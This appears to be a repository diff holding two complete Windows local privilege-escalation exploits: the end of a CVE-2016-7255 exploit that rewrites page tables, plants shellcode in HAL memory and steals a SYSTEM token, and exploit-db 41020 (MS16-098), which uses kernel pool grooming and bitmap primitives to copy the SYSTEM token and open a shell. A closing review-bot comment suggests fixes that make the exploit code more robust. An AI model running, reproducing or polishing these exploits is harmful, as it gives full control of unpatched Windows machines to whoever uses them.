GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndChild)
{
break;
}
#ifdef _WIN64
pId = ((UCHAR*)pAddress - 0x28);
#else
pId = ((UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64
SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);
DbgPrint("hWndChild = 0x%p\n", hWndChild);
ShowWindow(hWndParent, SW_SHOWNORMAL);
SetParent(hWndChild, GetDesktopWindow());
SetForegroundWindow(hWndChild);
_sim_alt_shift_tab(4);
SwitchToThisWindow(hWndChild, TRUE);
_sim_alt_shift_esc();
while (GetMessage(&stMsg, NULL, 0, 0)) {
SetFocus(hWndParent);
_sim_alt_esc(20);
SetFocus(hWndChild);
_sim_alt_esc(20);
TranslateMessage(&stMsg);
DispatchMessage(&stMsg);
if (value != 0) {
break;
}
__try {
value = *(UINT64 *)PML4_SELF_REF;
if ((value & 0x67) == 0x67) {
printf("Value Self Ref = %llx\n", value);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
continue;
}
}
} while (FALSE);
if (NULL != hWndParent)
{
DestroyWindow(hWndParent);
hWndParent = NULL;
}
if (NULL != hWndChild)
{
DestroyWindow(hWndChild);
hWndChild = NULL;
}
UnregisterClassW(pszClassName, GetModuleHandleW(NULL));
return 0;
}
UINT64 get_pxe_address(UINT64 address) {
UINT entry = PML4_SELF_REF_INDEX;
UINT64 result = address >> 9;
UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);
UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;
result = result | lower_boundary;
result = result & upper_boundary;
return result;
}
UINT64 look_free_entry_pml4(void) {
// Looks for a free pml4e in the last 0x100 bytes of the PML4
int offset = 0xF00;
UINT64 pml4_search = PML4_BASE + offset;
while (offset < 0xFF8)
{
if ((*(PVOID *)pml4_search) == 0x0)
{
// This is a NULL (free) entry
break;
}
offset += 8;
pml4_search = PML4_BASE + offset;
}
return pml4_search;
}
UINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {
UINT64 index = (spurious_offset & 0xFFF) / 8;
UINT64 result = (
((UINT64)0xFFFF << 48) |
((UINT64)PML4_SELF_REF_INDEX << 39) |
((UINT64)PML4_SELF_REF_INDEX << 30) |
((UINT64)PML4_SELF_REF_INDEX << 21) |
(index << 12)
);
return result;
}
UINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {
/*
1: kd> !pte ffffffff`ffd00000
VA ffffffffffd00000
PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800
contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963
pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V
*/
UINT64 pte = get_pxe_address(virtual_address);
int pte_offset = pte & 0xFFF;
//printf("PTE: %llx, %x\n", pte, pte_offset);
UINT64 pde = get_pxe_address(pte);
int pde_offset = pde & 0xFFF;
//printf("PDE: %llx, %x\n", pde, pde_offset);
UINT64 pdpte = get_pxe_address(pde);
int pdpte_offset = pdpte & 0xFFF;
//printf("PDPTE: %llx,%x\n", pdpte, pdpte_offset);
UINT64 pml4e = get_pxe_address(pdpte);
int pml4e_offset = pml4e & 0xFFF;
//printf("PML4E: %llx\n", pml4e, pml4e_offset);
UINT64 spurious_offset = look_free_entry_pml4();
printf("[+] Selected spurious PML4E: %llx\n", spurious_offset);
UINT64 f_e_pml4 = spurious_offset;
UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);
printf("[+] Spurious PT: %llx\n", spurious_pt);
printf("--------------------------------------------------\n\n");
//Read the physical address of pml4e
UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);
printf("[+] Content pml4e %llx: %llx\n", pml4e, pml4e_pfn);
// Change the PxE
pml4e_pfn = pml4e_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PML4e) %llx: %llx\n",f_e_pml4, pml4e_pfn);
*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pdpte
UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);
printf("[+] Content pdpte %llx: %llx\n", pdpte, pdpte_pfn);
// Change the PxE
pdpte_pfn = pdpte_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PDPTE) %llx: %llx\n", spurious_offset, pdpte_pfn);
*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pde
UINT64 pde_addr = spurious_pt + pde_offset;
UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);
printf("[+] Content pdpe %llx: %llx\n", pde, pde_pfn);
// Change the PxE
pde_pfn = pde_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PDE) %llx: %llx\n", spurious_offset, pde_pfn);
*((PVOID *)spurious_offset) = (PVOID)pde_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pte
UINT64 pte_addr = spurious_pt + pte_offset;
UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);
printf("[+] Content pte %llx: %llx\n", pte, pte_pfn);
// Change the PxE
pte_pfn = pte_pfn | 0x67; // Set U/S
pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX
if (patch_original) {
printf("*** Patching the original location to enable NX...\n");
*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;
}
printf("[+] Patching the Spurious Offset (PTE) %llx: %llx\n", spurious_offset, pte_pfn);
*((PVOID *)spurious_offset) = (PVOID)pte_pfn;
Sleep(0x1); // Sleep for TLB refresh;
printf("\n\n");
return spurious_pt;
}
UINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {
printf("[*] Getting Overwrite pointer: %llx\n", target_address);
UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);
OverwriteAddress += (target_address & 0xFFF);
printf("OverwriteAddress: %llx\n", OverwriteAddress);
return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));
}
void overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {
UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);
OverwriteTarget += (target_address & 0xFFF);
UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;
printf("Patch OverwriteTarget: %llx with %llx\n", target, hook_address);
*(PVOID *)target = (PVOID)hook_address;
}
UINT64 store_shellcode_in_hal(void) {
//// Finally store the shellcode on the HAL
UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;
UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);
printf("HAL address: %llx\n", hal_heap);
// 0xffffffffffd00d50 this is a good offset to store shellcode
// 0xfff - 0xd50 = 0x2af space
memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));
return 0xffffffffffd00d50;
}
UINT64 GetHalDispatchTable() {
PCHAR KernelImage;
SIZE_T ReturnLength;
HMODULE hNtDll = NULL;
UINT64 HalDispatchTable;
HMODULE hKernelInUserMode = NULL;
PVOID KernelBaseAddressInKernelMode;
NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
hNtDll = LoadLibrary("ntdll.dll");
if (!hNtDll) {
printf("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
printf("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);
// Allocate the Heap chunk
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
ReturnLength);
if (!pSystemModuleInformation) {
printf("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtStatus = NtQuerySystemInformation(SystemModuleInformation,
pSystemModuleInformation,
ReturnLength,
&ReturnLength);
if (NtStatus != STATUS_SUCCESS) {
printf("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;
KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1;
printf("\t\t\t[+] Loaded Kernel: %s\n", KernelImage);
printf("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode);
hKernelInUserMode = LoadLibraryA(KernelImage);
if (!hKernelInUserMode) {
printf("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
// This is still in user mode
HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, "HalDispatchTable");
if (!HalDispatchTable) {
printf("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
else {
HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;
// Here we get the address of HapDispatchTable in Kernel mode
HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);
printf("\t\t\t[+] HalDispatchTable: 0x%llx\n", HalDispatchTable);
}
HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);
if (hNtDll) {
FreeLibrary(hNtDll);
}
if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}
hNtDll = NULL;
hKernelInUserMode = NULL;
pSystemModuleInformation = NULL;
return HalDispatchTable;
}
int __cdecl main(int argc, char** argv)
{
TCHAR pre_username[256];
TCHAR post_username[256];
DWORD size = 256;
ULONG Interval = 0;
HMODULE hNtDll = NULL;
UINT retval;
UINT64 overwrite_address;
int overwrite_offset;
// define operating system version specific variables
unsigned char sc_KPROCESS;
unsigned int sc_TOKEN;
unsigned int sc_APLINKS;
int osversion;
if (argc != 2) {
printf("Please enter an OS version\n");
printf("The following OS'es are supported:\n");
printf("\t[*] 7 - Windows 7\n");
printf("\t[*] 81 - Windows 8.1\n");
printf("\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\n");
printf("\t[*] 12 - Windows 2012 R2\n");
printf("\n");
printf("\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\n");
return -1;
}
osversion = _strtoui64(argv[1], NULL, 10);
if(osversion == 7)
{
// the target machine's OS is Windows 7 SP1
printf(" [+] Windows 7 SP1\n");
sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)
sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = GetHalDispatchTable(); // HalDispatchTable
overwrite_offset = 0x8; // QueryIntervalProfile
}
else if(osversion == 81)
{
// the target machine's OS is Windows 8.1
printf(" [+] Windows 8.1\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
else if(osversion == 10)
{
// the target machine's OS is Windows 10 prior to build 14393
printf(" [+] Windows 10\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
else if(osversion == 12)
{
// the target machine's OS is Windows 2012 R2
printf(" [+] Windows 2012 R2\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
// in case the OS version is not any of the previously checked versions
else
{
printf(" [-] Unsupported version\n");
printf(" [*] Affected 64-bit operating systems\n");
printf(" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\n");
printf(" [*] Windows 8.1 -- cve-2016-7255.exe 81\n");
printf(" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\n");
printf(" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\n");
return -1;
}
printf("My PID is: %d\n", GetCurrentProcessId());
GetUserName(pre_username, &size);
printf("Current Username: %s\n", pre_username);
printf("PML4 Self Ref: %llx\n", PML4_SELF_REF);
printf("Shellcode stored at: %p\n", (void *) &shellcode);
printf("Enter to continue...\n");
getchar();
do
{
or_address_value_4((void*)PML4_SELF_REF);
} while (FALSE);
PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);
printf("[*] Self Ref Index: %x\n", PML4_SELF_REF_INDEX);
PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);
UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);
printf("Original OverwriteTarget pointer: %llx\n", original_pointer);
DWORD pid = GetCurrentProcessId();
/* Shellcode Patching !! */
char *p = shellcode;
p += 4; // skip the CLI, PUSHF and MOV RAX bytes
*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1
p += 12; // Patch shellcode with original value in the Overwrite address
*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);
p += 12; // To patch the PID of our process
*(DWORD *)p = (DWORD)pid;
p += 17;
*(unsigned char *)p = (unsigned char)sc_KPROCESS;
p += 7;
*(unsigned int *)p = (unsigned int)sc_APLINKS;
p += 20;
*(unsigned int *)p = (unsigned int)sc_TOKEN;
p += 20;
*(unsigned int *)p = (unsigned int)sc_TOKEN;
UINT64 shellcode_va = store_shellcode_in_hal();
printf("[+] w00t: Shellcode stored at: %llx\n", shellcode_va);
overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);
if (osversion == 7){
// Exploit Win7.1
hNtDll = LoadLibrary("ntdll.dll");
if (!hNtDll) {
printf("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) {
printf("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQueryIntervalProfile(0x1337, &Interval);
}
while (1) {
size = 256;
GetUserName(post_username, &size);
if (memcmp(post_username, pre_username, 256) != 0) break;
}
Sleep(2000);
system("cmd.exe");
return 0;
}

309
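--- a/platforms/windows/local/41020.c
+++ b/platforms/windows/local/41020.c
@@ -0,0 +1,309 @@
+// Source: https://github.com/sensepost/ms16-098/tree/b85b8dfdd20a50fc7bc6c40337b8de99d6c4db80
+// Binary: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe
+#include <Windows.h>
+#include <wingdi.h>
+#include <stdio.h>
+#include <winddi.h>
+#include <time.h>
+#include <stdlib.h>
+#include <Psapi.h>
+HANDLE hWorker, hManager;
+BYTE *bits;
+//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
+typedef struct
+{
+DWORD UniqueProcessIdOffset;
+DWORD TokenOffset;
+} VersionSpecificConfig;
+VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1
+void AllocateClipBoard2(unsigned int size) {
+BYTE *buffer;
+buffer = malloc(size);
+memset(buffer, 0x41, size);
+buffer[size - 1] = 0x00;
+const size_t len = size;
+HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
+memcpy(GlobalLock(hMem), buffer, len);
+GlobalUnlock(hMem);
+//OpenClipboard(0);
+//EmptyClipboard();
+SetClipboardData(CF_TEXT, hMem);
+//CloseClipboard();
+//GlobalFree(hMem);
+}
+static HBITMAP bitmaps[5000];
+void fungshuei() {
+HBITMAP bmp;
+// Allocating 5000 Bitmaps of size 0xf80 leaving 0x80 space at end of page.
+for (int k = 0; k < 5000; k++) {
+//bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70
+bmp = CreateBitmap(1670, 2, 1, 8, NULL); // 1680 = 0xf80 1685 = 0xf90 allocation size 0xfa0
+bitmaps[k] = bmp;
+}
+HACCEL hAccel, hAccel2;
+LPACCEL lpAccel;
+// Initial setup for pool fengshui.
+lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
+SecureZeroMemory(lpAccel, sizeof(ACCEL));
+// Allocating 7000 accelerator tables of size 0x40 0x40 *2 = 0x80 filling in the space at end of page.
+HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
+HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
+for (INT i = 0; i < 7000; i++) {
+hAccel = CreateAcceleratorTableA(lpAccel, 1);
+hAccel2 = CreateAcceleratorTableW(lpAccel, 1);
+pAccels[i] = hAccel;
+pAccels2[i] = hAccel2;
+}
+// Delete the allocated bitmaps to free space at beiginig of pages
+for (int k = 0; k < 5000; k++) {
+DeleteObject(bitmaps[k]);
+}
+//allocate Gh04 5000 region objects of size 0xbc0 which will reuse the free-ed bitmaps memory.
+for (int k = 0; k < 5000; k++) {
+CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0
+}
+// Allocate Gh05 5000 bitmaps which would be adjacent to the Gh04 objects previously allocated
+for (int k = 0; k < 5000; k++) {
+bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size = 3c0
+bitmaps[k] = bmp;
+}
+// Allocate 17500 clipboard objects of size 0x60 to fill any free memory locations of size 0x60
+for (int k = 0; k < 1700; k++) { //1500
+AllocateClipBoard2(0x30);
+}
+// delete 2000 of the allocated accelerator tables to make holes at the end of the page in our spray.
+for (int k = 2000; k < 4000; k++) {
+DestroyAcceleratorTable(pAccels[k]);
+DestroyAcceleratorTable(pAccels2[k]);
+}
+}
+void SetAddress(BYTE* address) {
+for (int i = 0; i < sizeof(address); i++) {
+bits[0xdf0 + i] = address[i];
+}
+SetBitmapBits(hManager, 0x1000, bits);
+}
+void WriteToAddress(BYTE* data) {
+SetBitmapBits(hWorker, sizeof(data), data);
+}
+LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) {
+SetAddress((BYTE *)&src);
+return GetBitmapBits(hWorker, len, dst);
+}
+// Get base of ntoskrnl.exe
+ULONG64 GetNTOsBase()
+{
+ULONG64 Bases[0x1000];
+DWORD needed = 0;
+ULONG64 krnlbase = 0;
+if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+krnlbase = Bases[0];
+}
+return krnlbase;
+}
+// Get EPROCESS for System process
+ULONG64 PsInitialSystemProcess()
+{
+// load ntoskrnl.exe
+ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
+// get address of exported PsInitialSystemProcess variable
+ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
+FreeLibrary((HMODULE)ntos);
+ULONG64 res = 0;
+ULONG64 ntOsBase = GetNTOsBase();
+// subtract addr from ntos to get PsInitialSystemProcess offset from base
+if (ntOsBase) {
+ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64));
+}
+return res;
+}
+// Get EPROCESS for current process
+ULONG64 PsGetCurrentProcess()
+{
+ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
+// walk ActiveProcessLinks until we find our Pid
+LIST_ENTRY ActiveProcessLinks;
+ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
+ULONG64 res = 0;
+while (TRUE) {
+ULONG64 UniqueProcessId = 0;
+// adjust EPROCESS pointer for next entry
+pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
+// get pid
+ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
+// is this our pid?
+if (GetCurrentProcessId() == UniqueProcessId) {
+res = pEPROCESS;
+break;
+}
+// get next entry
+ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
+// if next same as last, we reached the end
+if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64))
+break;
+}
+return res;
+}
+void main(int argc, char* argv[]) {
+HDC hdc = GetDC(NULL);
+HDC hMemDC = CreateCompatibleDC(hdc);
+HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
+HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
+static POINT points[0x3fe01];
+for (int l = 0; l < 0x3FE00; l++) {
+points[l].x = 0x5a1f;
+points[l].y = 0x5a1f;
+}
+points[2].y = 20;
+points[0x3FE00].x = 0x4a1f;
+points[0x3FE00].y = 0x6a1f;
+if (!BeginPath(hMemDC)) {
+fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
+}
+for (int j = 0; j < 0x156; j++) {
+if (j > 0x1F && points[2].y != 0x5a1f) {
+points[2].y = 0x5a1f;
+}
+if (!PolylineTo(hMemDC, points, 0x3FE01)) {
+fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
+}
+}
+EndPath(hMemDC);
+//Kernel Pool Fung=Shuei
+fungshuei();
+//getchar();
+fprintf(stdout, "[+] Trigerring Exploit.\r\n");
+if (!FillPath(hMemDC)) {
+fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
+}
+printf("%s\r\n", "Done filling.");
+HRESULT res;
+VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+if (!fake) {
+fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
+}
+memset(fake, 0x1, 0x100);
+bits = malloc(0x1000);
+memset(bits, 0x42, 0x1000);
+for (int k=0; k < 5000; k++) {
+res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
+if (res > 0x150) {
+fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
+hManager = bitmaps[k];
+hWorker = bitmaps[k + 1];
+// Get Gh05 header to fix overflown header.
+static BYTE Gh04[0x9];
+fprintf(stdout, "\r\nGh04 header:\r\n");
+for (int i = 0; i < 0x10; i++){
+Gh04[i] = bits[0x1d0 + i];
+fprintf(stdout, "%02x", bits[0x1d0 + i]);
+}
+// Get Gh05 header to fix overflown header.
+static BYTE Gh05[0x9];
+fprintf(stdout, "\r\nGh05 header:\r\n");
+for (int i = 0; i < 0x10; i++) {
+Gh05[i] = bits[0xd90 + i];
+fprintf(stdout, "%02x", bits[0xd90 + i]);
+}
+// Address of Overflown Gh04 object header
+static BYTE addr1[0x7];
+fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
+for (int j = 0; j < 0x8; j++) {
+addr1[j] = bits[0x210 + j];
+fprintf(stdout, "%02x", bits[0x210 + j]);
+}
+//Get pvscan0 address of second Gh05 object
+static BYTE* pvscan[0x07];
+fprintf(stdout, "\r\nPvsca0:\r\n");
+for (int i = 0; i < 0x8; i++) {
+pvscan[i] = bits[0xdf0 + i];
+fprintf(stdout, "%02x", bits[0xdf0 + i]);
+}
+// Calculate address to overflown Gh04 object header.
+addr1[0x0] = 0;
+int u = addr1[0x1];
+u = u - 0x10;
+addr1[1] = u;
+//Fix overflown Gh04 object Header
+SetAddress(addr1);
+WriteToAddress(Gh04);
+// Calculate address to overflown Gh05 object header.
+addr1[0] = 0xc0;
+int y = addr1[1];
+y = y + 0xb;
+addr1[1] = y;
+//Fix overflown Gh05 object Header
+SetAddress(addr1);
+WriteToAddress(Gh05);
+// get System EPROCESS
+ULONG64 SystemEPROCESS = PsInitialSystemProcess();
+//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
+ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
+//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
+ULONG64 SystemToken = 0;
+// read token from system process
+ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
+// write token to current process
+ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
+SetAddress((BYTE *)&CurProccessAddr);
+WriteToAddress((BYTE *)&SystemToken);
+// Done and done. We're System :)
+system("cmd.exe");
+break;
+}
+if (res == 0) {
+fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
+}
+}
+getchar();
+//clean up
+DeleteObject(bitobj);
+DeleteObject(bitmap);
+DeleteDC(hMemDC);
+ReleaseDC(NULL, hdc);
+VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
+//free(points);
+}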
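Review bot: The header-capture buffers in main are declared smaller than the loops that fill them: `static BYTE Gh04[0x9]` and `static BYTE Gh05[0x9]` each receive 0x10 bytes, `static BYTE addr1[0x7]` receives 8, and `static BYTE* pvscan[0x07]` is an array of seven pointers that is filled byte-by-byte over 8 slots, so every one of these loops writes past the end of its array (undefined behavior that merely happens to land in adjacent static storage). Sizing them to the loop bounds, `static BYTE Gh04[0x10], Gh05[0x10], addr1[0x8], pvscan[0x8];`, removes the out-of-bounds writes and the BYTE-to-pointer assignment. Relatedly, `SetAddress` and `WriteToAddress` take `BYTE*` parameters and bound their copies with `sizeof(address)` / `sizeof(data)`, which is the size of the pointer, not of the pointed-to data; an explicit `size_t len` parameter, as `ReadFromAddress` already has with `len`, would make the intended length visible instead of relying on the pointer width. The `malloc` results in `AllocateClipBoard2`, `fungshuei` and `main` are used without a NULL check, and `buffer` in `AllocateClipBoard2` is never freed.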